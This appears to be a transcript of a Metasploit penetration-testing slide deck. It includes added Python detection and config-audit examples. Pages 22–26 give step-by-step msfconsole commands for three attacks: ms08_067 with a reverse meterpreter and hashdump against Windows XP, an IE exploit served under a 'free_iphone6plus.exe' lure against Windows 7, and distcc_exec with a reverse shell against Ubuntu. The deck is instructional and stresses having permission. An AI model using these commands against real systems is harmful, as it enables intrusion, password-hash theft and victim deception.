pen-testing with metasploit

Pen-Testing With Metasploit By - Mohammed Danish Amber

Upload: mohammed-danish-amber

Post on 02-Dec-2014

DESCRIPTION

Penetration testing using Metasploit: Windows XP, Windows 7, Linux server.

TRANSCRIPT

Page 1: Pen-Testing with Metasploit

Pen-Testing With Metasploit

By - Mohammed Danish Amber

Page 2: Pen-Testing with Metasploit

AGENDA

▪ Why & What's Pen-Testing

▪ About Metasploit

▪ Metasploit Basic & Meterpreter

▪ Demo

Page 3: Pen-Testing with Metasploit

Mohammed Danish Amber

▪ Geek & Security Analyst

▪ Information Security Enthusiast

▪ Working in TCS

▪ Lecturer & Engineer

▪ Collaborative Project - Hacker Ecosystem

▪ Make Internet a Secure Place

Page 4: Pen-Testing with Metasploit

Why Pen-Testing

▪ Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches

▪ A penetration test is one of the most effective ways to identify weaknesses and deficiencies in these programs

Page 5: Pen-Testing with Metasploit

What's Pen-Testing

▪ A method to evaluate the security of a computer system or network

▪ Practice (attacking) an IT system like a ‘hacker’ does

– Find security holes (weaknesses)

– Bypass security mechanisms

– Compromise an organization’s IT system security

MUST HAVE PERMISSION FROM IT SYSTEM OWNER

ILLEGAL ACTIVITY CAN PUT YOU IN JAIL!

Page 6: Pen-Testing with Metasploit

ETHICS

▪ THINK BEFORE YOU ACT

▪ DON'T BE STUPID

▪ DON'T BE MALICIOUS

Page 7: Pen-Testing with Metasploit

PEN-TESTING PHASES

INFORMATION GATHERING

VULNERABILITY ANALYSIS

EXPLOITATION

POST EXPLOITATION

REPORTING

Page 8: Pen-Testing with Metasploit
Page 9: Pen-Testing with Metasploit

Metasploit

▪ Not just a tool but an entire framework

▪ An open source platform for writing security tools and exploits

▪ Easily build attack vectors to add to its exploits, payloads and encoders

▪ Create and execute more advanced attacks

▪ Ruby based

Page 10: Pen-Testing with Metasploit

Metasploit Interfaces

▪ MSFconsole

▪ msfweb, msfgui (discontinued)

▪ Metasploit Pro & Community Edition

▪ Armitage

Page 11: Pen-Testing with Metasploit

MSFconsole

Page 12: Pen-Testing with Metasploit

MSFcli

Page 13: Pen-Testing with Metasploit

Metasploit Terminology

▪ Exploit: Code that allows a pentester to take advantage of a flaw within a system, application, or service

▪ Payload: Code that we want the target system to execute (a few commands to be executed on the target system)

▪ Shellcode: A set of instructions used as a payload when exploitation occurs

▪ Module: A piece of software that can be used by Metasploit

▪ Listener: A component waiting for an incoming connection

Page 14: Pen-Testing with Metasploit

How Exploitation Works

Attacker sends: Exploit + Payload

Vulnerable Server: Exploit run + Payload run

Upload + download DATA

Page 15: Pen-Testing with Metasploit

Meterpreter

▪ Used as a payload after a vulnerability is exploited

▪ Improves post-exploitation

Page 16: Pen-Testing with Metasploit

Meterpreter

Exploiting a vulnerability

Select a meterpreter as a payload

Meterpreter shell

Page 17: Pen-Testing with Metasploit

Meterpreter Commands

Page 18: Pen-Testing with Metasploit

Meterpreter Commands

Page 19: Pen-Testing with Metasploit

Meterpreter Commands

Page 20: Pen-Testing with Metasploit

Meterpreter Commands

Page 21: Pen-Testing with Metasploit

Meterpreter Commands

Page 22: Pen-Testing with Metasploit

Windows XP Exploitation

▪ msf > search windows/smb

▪ msf > info exploit/windows/smb/ms08_067_netapi

▪ msf > use exploit/windows/smb/ms08_067_netapi

▪ msf exploit(ms08_067_netapi) > show payloads

▪ msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

▪ msf exploit(ms08_067_netapi) > show options

▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip>

▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip>

▪ msf exploit(ms08_067_netapi) > show options

▪ msf exploit(ms08_067_netapi) > exploit

▪ meterpreter > background

▪ sessions -l

Page 23: Pen-Testing with Metasploit

Windows XP Exploitation

▪ sessions -i 1

▪ meterpreter > getsystem -h

▪ getuid

▪ hashdump

Page 24: Pen-Testing with Metasploit

Windows 7 Exploitation

▪ msf > use exploit/windows/browser/ms11_003_ie_css_import

▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp

▪ msf exploit(ms11_003_ie_css_import) > show options

▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <attacker ip>

▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80

▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe

▪ msf exploit(ms11_003_ie_css_import) > set LHOST <attacker ip>

▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443

▪ msf exploit(ms11_003_ie_css_import) > exploit

Just wait until the victim opens the URL http://<attacker ip>:80/free_iphone6plus.exe

Page 25: Pen-Testing with Metasploit

Windows 7 Exploitation

▪ msf exploit(ms11_003_ie_css_import) > sessions -l

▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1

▪ meterpreter > sysinfo

▪ meterpreter > shell
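
A detection-side view of the Windows 7 walkthrough above, as an added example that is not part of the original slides: it flags a proxy record where a URL ending in an executable extension on a bare-IP host returns HTML, then pairs it with a later outbound flow from the same client to that server. The log tuples, field layout and addresses are constructed, and the HTML response type is an assumption about how a browser exploit page is served.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample data (not from the slides).
# Proxy records: (epoch_seconds, client, url, response_content_type)
PROXY = [
    (1000, "10.0.0.21", "http://192.0.2.50:80/free_iphone6plus.exe", "text/html"),
    (1005, "10.0.0.22", "http://downloads.example.com/setup.exe",
     "application/octet-stream"),
    (1010, "10.0.0.23", "http://192.0.2.77/index.html", "text/html"),
]
# Firewall flow records: (epoch_seconds, client, dest_ip, dest_port)
FLOWS = [
    (1003, "10.0.0.21", "192.0.2.50", 443),
    (1500, "10.0.0.23", "192.0.2.77", 443),
]
EXECUTABLE_EXT = (".exe", ".scr", ".msi")


def is_ip_literal(host):
    """True when the URL host is an IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_downloads(proxy):
    """URL names an executable on a bare-IP host, but the body is HTML."""
    hits = []
    for ts, client, url, ctype in proxy:
        parts = urlsplit(url)
        host = parts.hostname or ""
        media_type = ctype.split(";")[0].strip().lower()
        if (is_ip_literal(host)
                and parts.path.lower().endswith(EXECUTABLE_EXT)
                and media_type == "text/html"):
            hits.append((ts, client, host))
    return hits


def correlate(proxy, flows, window=60):
    """Pair each suspicious download with an outbound flow from the same
    client to the same server within `window` seconds of the request."""
    alerts = []
    for ts, client, host in suspicious_downloads(proxy):
        for fts, fclient, dest, port in flows:
            if fclient == client and dest == host and 0 <= fts - ts <= window:
                alerts.append({"client": client, "server": host, "callback_port": port})
    return alerts
```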

Page 26: Pen-Testing with Metasploit

Ubuntu Exploitation

▪ search distcc

▪ use exploit/unix/misc/distcc_exec

▪ show payloads

▪ set PAYLOAD cmd/unix/reverse

▪ show options

▪ set rhost <victim ip>

▪ set lhost <attacker ip>
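
From the defender's side of the distcc step above, an added example (not from the original slides) that audits a Debian/Ubuntu-style /etc/default/distcc for a daemon that accepts jobs from more than a small trusted range. The sample file is constructed, and it assumes the STARTDISTCC, ALLOWEDNETS and LISTENER keys of that file, with an empty LISTENER meaning all interfaces.

```python
import ipaddress
import shlex

# Constructed sample of a Debian/Ubuntu-style /etc/default/distcc.
SAMPLE = '''
# defaults for distcc
STARTDISTCC="true"
ALLOWEDNETS="127.0.0.1 0.0.0.0/0 192.168.10.0/24"
LISTENER=""
'''


def parse_defaults(text):
    """Read KEY="value" shell assignments into a dict, ignoring comments."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        tokens = shlex.split(value)  # removes the shell quoting
        settings[key.strip()] = tokens[0] if tokens else ""
    return settings


def audit(text, max_hosts=256):
    """Return findings for a distccd that is reachable beyond a trusted range."""
    cfg = parse_defaults(text)
    findings = []
    if cfg.get("STARTDISTCC", "false").lower() != "true":
        return findings  # daemon is not started from this file
    listener = cfg.get("LISTENER", "")
    if listener not in ("127.0.0.1", "::1"):
        # Assumption: an empty LISTENER leaves the daemon on all interfaces.
        findings.append(f"listens on {listener or 'all interfaces'}")
    nets = cfg.get("ALLOWEDNETS", "").split()
    if not nets:
        findings.append("ALLOWEDNETS is empty")
    for net in nets:
        size = ipaddress.ip_network(net, strict=False).num_addresses
        if size > max_hosts:
            findings.append(f"ALLOWEDNETS entry {net} admits {size} addresses")
    return findings
```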

Page 27: Pen-Testing with Metasploit

Any Questions?

Page 28: Pen-Testing with Metasploit

Thanks To

▪ Kali / BackTrack Linux

▪ Metasploit Team (HD Moore & rapid7)

▪ Offensive Security / Metasploit Unleashed

▪ David Kennedy

▪ Georgia Weidman

▪ Null Hyderabad Chapter - CORE TEAM

▪ #nullhyd @nullhyd

Page 29: Pen-Testing with Metasploit

WWW.MOHAMMEDDANISHAMBER.COM